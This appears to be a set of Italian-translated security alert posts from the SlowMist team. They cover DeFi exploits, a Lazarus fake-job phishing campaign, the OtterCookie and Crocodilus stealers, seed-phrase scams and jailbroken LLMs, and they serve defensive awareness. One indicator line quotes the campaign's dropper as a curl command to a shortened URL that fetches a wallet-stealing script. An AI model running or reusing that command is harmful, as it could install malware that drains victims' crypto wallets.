Il nostro sistema di monitoraggio MistEye ha rilevato transazioni sospette che coinvolgono @ResupplyFi , con perdite di circa $5.59M.
L'attaccante ha manipolato il tasso di cambio cvcrvUSD effettuando donazioni al contratto del Controller cvcrvUSD, rubando infine una grande quantità di token reUSD.
Il nostro sistema di monitoraggio MistEye ha rilevato transazioni sospette che coinvolgono @ResupplyFi, con perdite di circa $5,59M.
L'attaccante ha manipolato il tasso di cambio cvcrvUSD effettuando donazioni al contratto del Controller crvUSD, rubando infine una grande quantità di token reUSD.
💰Oltre $50B USDT in depositi e $50B in prelievi sono passati attraverso HuionePay negli ultimi 18 mesi — ora sotto scrutinio normativo globale per aver presumibilmente ricevuto, spostato e incassato fondi di frode (principalmente tramite USDT su TRON).
Abbiamo analizzato i dati con @MistTrack_io e creato un dashboard Dune per mappare la sua impronta on-chain.
Secondo il partner della comunità @1nf0s3cpt, una campagna di phishing attiva sta prendendo di mira gli utenti di Web3 con offerte di lavoro false (ad es. $120/ora) per ingannarli a eseguire uno script malevolo che ruba file di wallet.
🔍 I principali IOCs: 🔸Repo GitLab: https://t.co/ivGN93PS4b 🔸Dropper: curl https://t.co/fwRuktoVd9 -H "x-secret-key: _"
🧪 Il metodo d'attacco è molto simile all'uso precedente di pacchetti NPM da parte di Lazarus per diffondere codice malevolo: https://t.co/bBC4i2vYpA
🚨 Abbiamo trovato che un nuovo pacchetto NPM malevolo è stato appena pubblicato: https://t.co/SjgmO1FOIL 🔸Probabilmente collegato a GitHub: apollo-hero 🔸Email dell'uploadatore: skelstar125@gmail.com
⚠️ NON installare o eseguire pacchetti o script sconosciuti. Verifica sempre le fonti.
Abbiamo rilevato potenziali attività sospette relative a @meta_pool. La causa principale è che la funzione _deposit è stata riscritta, consentendo la coniazione arbitraria tramite la funzione mint senza la necessità di trasferire token.
‼️ Fai attenzione a una nuova minaccia del gruppo APT LAZARUS — il malware #OtterCookie info-stealer sta prendendo di mira i professionisti nei settori della finanza e delle criptovalute.
🎯 Tattiche di attacco: 🔹 Spacciarsi per aziende rispettabili con colloqui o proposte di investimento falsi 🔹 Utilizzare deepfake per impersonare intervistatori/investitori durante le videochiamate 🔹 Ingannare le vittime per eseguire malware travestito da sfide di codifica o aggiornamenti di app video 🔹 Una volta eseguito, OtterCookie ruba silenziosamente dati sensibili
🕵️♂️ I target includono: 🔹 Credenziali memorizzate nel browser 🔹 Password e certificati del portachiavi macOS 🔹 Informazioni sul wallet di criptovaluta memorizzate localmente e chiavi private
🛡️ Rimani al sicuro: 🔹 Verifica tutte le offerte di lavoro/investimento non richieste 🔹 Non eseguire mai binari sconosciuti, specialmente “sfide” o “aggiornamenti” 🔹 Utilizza software antivirus e monitora comportamenti anomali
SlowMist ha recentemente ricevuto informazioni che indicano che il gruppo APT Lazarus sta utilizzando un nuovo stealer chiamato OtterCookie in attacchi mirati a professionisti del settore crypto & finanza.
🎭Tattiche: - Colloqui di lavoro/investimenti falsi - Video deepfake per impersonare reclutatori - Malware mascherato da “sfide di programmazione” o “aggiornamenti”
😈Ruba: - Credenziali di accesso memorizzate nel browser - Password e certificati dal portachiavi di macOS - Informazioni sul portafoglio e chiavi private
🛡️Raccomandazioni di Sicurezza: 🔹Tratta con cautela offerte di lavoro/investimento non richieste e colloqui remoti. 🔹Non eseguire mai file binari sconosciuti, specialmente se presentati come “sfide tecniche” o “pacchetti di aggiornamento.” 🔹Migliora le capacità EDR e monitora per attività anomale. Usa strumenti antivirus e controlla regolarmente i tuoi endpoint.
⚠️Stai al sicuro — verifica sempre prima di fidarti.
⚠️Mentre l'IA avanza, emerge un lato più oscuro: Modelli Linguistici di Grandi Dimensioni Senza Restrizioni.
A differenza dei LLM mainstream con misure di sicurezza integrate, questi modelli "sbloccatì" o deliberatamente modificati sono progettati per eludere le restrizioni etiche—permettendo phishing, generazione di malware e frodi.
In questo articolo, esploriamo l'ascesa di strumenti come WormGPT, FraudGPT e GhostGPT, il loro abuso nel settore delle criptovalute e le crescenti sfide di sicurezza che pongono.
Il trojan bancario Android #Crocodilus sta ora prendendo di mira gli utenti di criptovalute e le app bancarie a livello globale dopo recenti aggiornamenti.
⚠️ Minacce chiave:
🔹Si diffonde tramite aggiornamenti falsi del browser in annunci su Facebook 🔹Ruba le credenziali di accesso utilizzando attacchi di overlay 🔹Estrae frasi seed dei portafogli crypto e chiavi private 🔹Inietta numeri falsi di "supporto bancario" nelle liste di contatti 🔹Malware-as-a-Service: Disponibile per affitto (100–300 USDT/attacco)
📵 Evitare aggiornamenti di app sconosciute e link pubblicitari.
🎣Perdite da phishing tramite @realScamSniffer: 7.164 vittime ➡️ ~$9.6M rubati
Incidenti principali: • Il Protocollo Cetus ha perso $230M in un attacco di overflow matematico • Il Protocollo Cork è stato sfruttato per oltre $12M a causa di una validazione insufficiente dei dati forniti dagli utenti • BitoPro ha perso $11.5M; fondi riciclati tramite Tornado Cash, Thorchain e Wasabi • Demex ha perso $950K a causa di una manipolazione dell'oracolo che prendeva di mira un vault deprecato • Il Protocollo Zunami ha perso $500K; causa alla radice sotto indagine
Punti Salienti sulla Sicurezza: ⚠️Le vulnerabilità dei contratti hanno causato il 95% delle perdite totali da hack 🎭Le acquisizioni di account sono aumentate nuovamente 😈Il Gruppo Lazarus ora prende di mira gli individui—una vittima ha perso $5.2M a causa di malware
Recentemente abbiamo assistito un utente che ha incontrato uno strumento sospetto che affermava che il suo wallet aveva un “autorizzazione a rischio.” Lo strumento gli ha chiesto di incollare la sua chiave privata per risolvere il problema.
Dopo un'indagine, abbiamo identificato il sito—signature[.]land—come una piattaforma di phishing. Il sito è stato anche segnalato come malevolo dalla piattaforma anti-truffa Web3 @realScamSniffer.
Risultati chiave: ♦️L'interfaccia utente imita lo strumento legittimo Revoke ♦️I risultati di rischio sono fabbricati per qualsiasi input ♦️Tutti gli input degli utenti vengono inviati direttamente a: abpulimali@gmail[.]com
L'operatore dietro questo sito, @Titanspace3, utilizza molteplici tattiche ingannevoli: 🎭Usa l'avatar di @zachxbt su Telegram 🎭Si finge un dipendente di SlowMist 🎭Gestisce un account X con 74K follower, commentando frequentemente sotto i post degli utenti crypto, affermando falsamente che i loro wallet sono a rischio e indirizzandoli a un link di phishing travestito da “strumento di sicurezza.”
Flusso della truffa: 1⃣Fabbricare panico attorno a “approvazioni a rischio” 2⃣Attirare le vittime a utilizzare un sito di phishing 3⃣Istruirli a inserire chiavi private per la “revoca”
🛡️Raccomandazioni – Non incollare mai la tua chiave privata su nessun sito web – Utilizzare solo strumenti di sicurezza da fonti verificate e ufficiali – Rimanere vigili e seguire una mentalità di zero fiducia
Per un'analisi completa di questo caso, consulta il nostro ultimo articolo: https://t.co/IvrVPrT6Su
☠️Recentemente, più utenti hanno segnalato di aver ricevuto messaggi SMS da "scambi ben noti", che dicono:
🎭"Il tuo codice di verifica per il prelievo è xxx. Se non hai richiesto questa transazione, chiama subito xxx per assistenza."
📱Una volta che richiamerai, ti diranno che si tratta di una “violazione della sicurezza” e verrai messo in contatto con qualcuno che afferma di essere del “supporto portafoglio hardware.”
🎣Ti guidano verso un sito di phishing e ti ingannano per farti inserire la tua frase mnemonica — portando a furti di portafogli freddi per un valore superiore a 1 milione di dollari.
⚠️I truffatori sanno che ti fidi degli scambi — e sfruttano quella fiducia per ingannarti, passo dopo passo.
Recentemente abbiamo divulgato un caso simile — dai un’occhiata al nostro articolo dettagliato per rafforzare la tua consapevolezza e le tue difese: https://t.co/OLGtlY1HBV
Ricorda: 🔒Non condividere mai la tua frase mnemonica. 🚫Non fidarti di chiamate, messaggi o link inaspettati. Verifica sempre tramite fonti ufficiali.
Negli ultimi anni, gli utenti di Coinbase sono stati ripetutamente presi di mira da attacchi di ingegneria sociale — e il 15 maggio, Coinbase ha confermato il coinvolgimento di insider.
Come funziona:
📞 Chiamata di supporto falsa 📲 Guidare l'utente attraverso Coinbase Wallet ⚠️ Fornire una frase mnemonica fraudolenta 💸 Svuotare gli asset sotto stress e urgenza
Con @MistTrack_io, abbiamo tracciato i flussi:
▪️ BTC trasferito tramite THORChain / Chainflip / Defiway Bridge → DAI/USDT ▪️ ETH scambiato su Uniswap → DAI/USDT ▪️ Fondi riciclati o ancora dormienti
Abbiamo ricevuto segnalazioni di falsi gruppi Telegram che impersonano #SlowMist e truffano gli utenti tramite link di investimento phishing. Un esempio: ❌t[.]me/slowmist1 — questo NON siamo noi.‼️
✅ Si prega di segnalare immediatamente tali gruppi a Telegram.
Per la tua sicurezza, fai sempre riferimento ai nostri canali ufficiali: 1⃣Sito web: https://t.co/IO2VWk2pae 2⃣X: @SlowMist_Team & @MistTrack_io 3⃣Email: team@slowmist.com
Se hai dubbi, sentiti libero di contattarci direttamente in DM.
🚀Grandi novità! @MistTrack_io MCP è ora attivo per i test!
Ora puoi utilizzare il linguaggio naturale in #Claude, #Cursor e altri client supportati da MCP per chiamare le API di analisi on-chain di #MistTrack — dalla profilazione degli indirizzi & punteggi di rischio ai grafici di flusso dei fondi.
🧐Indagini sulla blockchain più intelligenti, veloci e facili — alimentate dall'IA.
✍️Nel nostro ultimo post: 🔹Cos'è MistTrack MCP 🔹Come usarlo 🔹Caratteristiche principali 🔹Esempi di casi reali https://t.co/Fvn2YZIuoI
👋Pronto per esplorare il nuovo paradigma dell'IA per il tracciamento on-chain? Inizia qui: https://t.co/UCDcC9Dt51